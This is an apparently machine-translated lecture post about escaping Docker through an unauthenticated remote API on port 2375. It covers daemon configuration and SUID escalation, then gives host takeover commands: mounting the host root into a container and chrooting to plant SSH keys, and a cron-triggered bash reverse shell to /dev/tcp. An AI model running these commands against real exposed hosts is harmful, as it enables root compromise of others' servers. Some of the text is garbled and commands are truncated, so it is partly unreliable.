Docker escape caused by unauthorized access of docker remote API

Docker escape caused by unauthorized access of docker remote API


It's a lecture for the students in the community md.

The server

Of course, if you want to learn this, local is enough. You can install docker in linux virtual machine to reproduce it.


Docker is an open source application container engine based on Go language And comply with Apache 2 0 protocol is open source.

Docker allows developers to package their applications and dependency packages into a lightweight and portable container, and then publish them to any popular Linux machine. It can also realize virtualization.

Containers completely use the sandbox mechanism, and there will be no interfaces between them (similar to iPhone app s). More importantly, the performance overhead of containers is very low.

Although Docker is really very different from virtual machine, for the first contact students, Docker can also be regarded as a virtual machine, which can be better compared and understood (the underlying implementation principles and details are indeed completely different, but it can be regarded as a virtual machine when used macroscopically.)

Docker mainly includes three aspects: image, container and warehouse.

Good introductory articles:

Installation direct reference

root@da7a193ee153:/# docker search ubuntu
NAME                                                      DESCRIPTION                                     STARS     OFFICIAL   AUTOMATED
ubuntu                                                    Ubuntu is a Debian-based Linux operating sys...   13462     [OK]
dorowu/ubuntu-desktop-lxde-vnc                            Docker image to provide HTML5 VNC interface ...   599                  [OK]
websphere-liberty                                         WebSphere Liberty multi-architecture images ...   282       [OK]
rastasheep/ubuntu-sshd                                    Dockerized SSH service, built on top of offi...   256                  [OK]
consol/ubuntu-xfce-vnc                                    Ubuntu container with "headless" VNC session...   243                  [OK]
ubuntu-upstart                                            DEPRECATED, as is Upstart (find other proces...   112       [OK]
neurodebian                                               NeuroDebian provides neuroscience research s...   88        [OK]
1and1internet/ubuntu-16-nginx-php-phpmyadmin-mysql-5      ubuntu-16-nginx-php-phpmyadmin-mysql-5          50                   [OK]
open-liberty                                              Open Liberty multi-architecture images based...   49        [OK]
ubuntu-debootstrap                                        DEPRECATED; use "ubuntu" instead                45        [OK]
i386/ubuntu                                               Ubuntu is a Debian-based Linux operating sys...   28
solita/ubuntu-systemd                                     Ubuntu + systemd                                24                   [OK]
nuagebec/ubuntu                                           Simple always updated Ubuntu docker images w...   24                   [OK]
fnndsc/ubuntu-python3                                     A slim Ubuntu-based Python3 image               24                   [OK]
1and1internet/ubuntu-16-apache-php-5.6                    ubuntu-16-apache-php-5.6                        14                   [OK]
1and1internet/ubuntu-16-apache-php-7.0                    ubuntu-16-apache-php-7.0                        13                   [OK]
1and1internet/ubuntu-16-nginx-php-phpmyadmin-mariadb-10   ubuntu-16-nginx-php-phpmyadmin-mariadb-10       11                   [OK]
1and1internet/ubuntu-16-nginx-php-5.6-wordpress-4         ubuntu-16-nginx-php-5.6-wordpress-4             9                    [OK]
1and1internet/ubuntu-16-nginx-php-5.6                     ubuntu-16-nginx-php-5.6                         8                    [OK]
1and1internet/ubuntu-16-apache-php-7.1                    ubuntu-16-apache-php-7.1                        7                    [OK]
1and1internet/ubuntu-16-nginx-php-7.0                     ubuntu-16-nginx-php-7.0                         4                    [OK]
1and1internet/ubuntu-16-php-7.1                           ubuntu-16-php-7.1                               1                    [OK]
1and1internet/ubuntu-16-sshd                              ubuntu-16-sshd                                  1                    [OK]
smartentry/ubuntu                                         ubuntu with smartentry                          1                    [OK]
1and1internet/ubuntu-16-rspec                             ubuntu-16-rspec                                 0                    [OK]
root@da7a193ee153:/# docker pull ubuntu
Using default tag: latest
latest: Pulling from library/ubuntu
ea362f368469: Pull complete
Digest: sha256:b5a61709a9a44284d88fb12e5c48db0409cfad5b69d4ff8224077c57302df9cf
Status: Downloaded newer image for ubuntu:latest

docker run -it ubuntu
uname -a

Docker swarm

Swarm is a cluster management tool officially provided by Docker. Its main function is to abstract several Docker hosts into a whole and uniformly manage various Docker resources on these Docker hosts through a portal. Swarm is similar to kubernetes, but it is lighter and has fewer functions than kubernetes.

Why mention it? In the method of creating Docker swarm cluster, docker run is officially recommended to run swarm container. The basic process is as follows:

  • You need to install docker on each machine and run Docker Swarm container
  • One or more swarm managers are required to manage the docker node
  • The managed docker node needs to open a TCP port (2375) to communicate with Swarm manager

The key lies in the third step. The docker node needs to open TCP port 2375 to communicate with swarm management. So what is the 2375 port of docker?

Docker Daemon([ 'di:mən ])

Docker daemon is a server component that runs as a Linux background service. It is the core background process of docker. We also call it a daemon. It is responsible for responding to requests from Docker Client, and then translating these requests into system calls to complete container management operations. The process will start an API Server in the background, which is responsible for receiving the requests sent by the Docker Client. The received requests will be distributed and scheduled through a route inside the docker daemon, and the requests will be executed by specific functions.

By default, the Docker daemon can only respond to client requests from the local Host. If you want to allow remote client requests, you need to turn on TCP listening in the configuration file.

2375 port of Docker

Port 2375 of Docker is the default port of docker remote API. It is generally not used (not occupied).

Why is it necessary to open TCP listening in the configuration file to enable the Docker daemon to respond to requests from remote clients.

First, look for docker Service file:

root@VM-0-6-ubuntu:~/.ssh# find / -name docker.service
find: '/proc/10537/task/10537/net': Invalid argument
find: '/proc/10537/net': Invalid argument

Add TCP for 2375:

ExecStart=/usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock -H tcp://

Then reload the configuration and restart the docker:

systemctl daemon-reload
systemctl restart docker

2375 port can realize remote access.

What is the use of docker remote API?

docker -H tcp:// ps -a

Very dangerous. However, as long as the 2375 port is not exposed on the public network, it is generally OK.

However, once it is leaked on the public network due to lack of attention or security awareness, it will be sent.

How to attack it?

You can execute the Docker command at will. Container that can operate Docker. If the website is deployed in the Docker container, you can enter the attack. However, after all, this is only the container of Docker and does not affect the main server. What can be done to use it?

The fundamental idea of its utilization may be a bit like SUID's right raising.

SUID right raising

As we all know, the file permissions in linux are generally as follows: rwx rwx rwx. They are 421, readable, writable and executable.

SUID (Set UID) is a special permission in Linux. Its function is that when a user runs a program, if the program has SUID permission, when the program runs as a process, the owner of the process is not the initiator, but the owner of the program file. However, setting SUID permission is only for binary executable files, and setting SUID for non executable files has no meaning

During execution, the caller will temporarily gain the owner's permission of the file, which is only valid during the execution of the program.

find / -user root -perm -4000 -print 2>/dev/null
chmod u+s /usr/bin/cat

But in fact, SUID has nothing to do with the content of this time. I just want to introduce this idea of raising rights.

Because Docker runs with root privileges. The Docker command can be executed arbitrarily, which means that there is an opportunity to raise rights. In fact, the following attacks of Docker are basically similar to the unauthorized attacks of Redis. Interested students can learn again later.

Attack method 1 - write public key

As we all know, ssh login in Linux can be directly logged in by entering user name and password, or by key.

The principle of key form login is to use the key generator to make a pair of keys - a public key and a private key. Add the public key to an account of the server, and then use the private key at the client to complete authentication and login. In this way, without the private key, no one can log in to the system remotely by brutally cracking your password through SSH. In addition, if you copy the public key to other accounts or even hosts, you can also log in with the private key.

(specific principles can be learned after class)

[root@VM-4-14-centos .ssh]# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Saving key "/root/.ssh/id_rsa" failed: passphrase is too short (minimum five characters)
[root@VM-4-14-centos .ssh]# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/
The key fingerprint is:
SHA256:JNGLYxRD5g2w9n9ddrVjZikOfEfIZIycJ/57roJTU4k root@VM-4-14-centos
The key's randomart image is:
+---[RSA 2048]----+
|    .oBo  . +o   |
|     +.=.  =+o.  |
|    o.o.o.. +o...|
|   . .+o. .E o. +|
|     ...S  ooooO.|
|       .   +++*..|
|        . + o..  |
|         + . . . |
|          . ..+. |
[root@VM-4-14-centos .ssh]#


You also need to edit / etc/ssh/sshd_config:

RSAAuthentication yes
PubkeyAuthentication yes
PermitRootLogin yes 

Where permitrotlogin is to allow root users to log in via ssh.

Restart the ssh service:

service sshd restart

What should we do next? Did any students think that Docker and Vmware have some similarities, one is to start a container, the other is to start a virtual machine, and the environment of the container and the virtual machine are separated.

Think about it again. Before, you wanted to put the files in the host into the virtual machine or put the files in the virtual machine into the host. You can directly cv, and it seems that you can also mount a shared folder in the virtual machine?

So, can Docker? Yes.

docker -H tcp:// run -it -v /:/mnt mattrayner/lamp chroot /mnt /bin/bash

docker pull busybox.

Attack mode 2-crontab timed task bounce shell

This is also a common means of raising rights. If the root user is not allowed to log in or the private key is not allowed to log in, you can rebound a shell.

With the crontab command, we can execute the specified system instructions or shell script at fixed intervals. The unit of time interval can be any combination of minutes, hours, days, months, weeks and above. This command is very suitable for periodic log analysis or data backup.

We often use the crontab command, which is short for cron table. It is the cron configuration file or job list. We can find the relevant configuration files in the following folder.

  • /The crontab tasks of each user including root are stored in the var/spool/cron / directory, and each task is named after the creator
  • /The etc/crontab file is responsible for scheduling various management and maintenance tasks.
  • /etc/cron.d / this directory is used to store any crontab files or scripts to be executed.
  • We can also put the script in / etc / cron hourly,/etc/cron.daily,/etc/cron.weekly,/etc/cron. In the monthly directory, let it execute every hour / day / week and month.

crontab -l: lists the crontab of the current user

# Examples of planned task definitions:
# . ----------------- minutes (0 - 59)
# |  .-------------  Time (0 - 23)
# |  |  .----------  Day (1 - 31)
# |  |  |  .-------  Month (1 - 12)
# |  |  |  |  .----  Week (0 - 7) (Sunday can be 0 or 7)
# |  |  |  |  |
# ** * * commands executed
* * * * * date >> /time.txt 2>&1

What's the use of timed tasks? Since there is root permission in the container, you can directly control the crontab file of root in the host after mounting, and you can get the root permission of the host by bouncing a shell.

bash -i >& /dev/tcp/ 0>&1

It's that simple.

Keywords: Operation & Maintenance Docker Container

Added by shadowwebs on Sun, 09 Jan 2022 17:43:10 +0200